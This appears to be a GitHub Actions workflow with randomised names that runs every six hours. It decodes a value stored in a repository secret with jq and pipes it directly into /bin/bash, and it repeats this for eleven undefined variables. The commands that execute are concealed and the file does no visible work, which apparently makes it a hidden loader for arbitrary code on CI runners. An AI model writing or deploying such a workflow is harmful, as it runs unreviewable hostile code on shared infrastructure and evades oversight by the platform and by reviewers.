name: xianhyu7jk

on:
  workflow_dispatch:
  schedule:
    - cron: '2 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xianhyu7jk
        env:
          myi96: ${{ secrets.myi96 }}
        run: |
          echo $myi96 | jq -r .gym38 | /bin/bash
          echo $rnwsm3 | jq -r .fz50976 | /bin/bash
          echo $m92 | jq -r .jrp41755 | /bin/bash
          echo $cxmgb9427 | jq -r .x05146 | /bin/bash
          echo $o842 | jq -r .glcwr9795 | /bin/bash
          echo $kb459 | jq -r .n08 | /bin/bash
          echo $h8 | jq -r .gnvy5732 | /bin/bash
          echo $qptpa88 | jq -r .dt1834 | /bin/bash
          echo $rfk62 | jq -r .cc16445 | /bin/bash
          echo $uggj45 | jq -r .ywr47 | /bin/bash
          echo $tf48 | jq -r .y8661 | /bin/bash
          echo $f878 | jq -r .onhlr9532 | /bin/bash

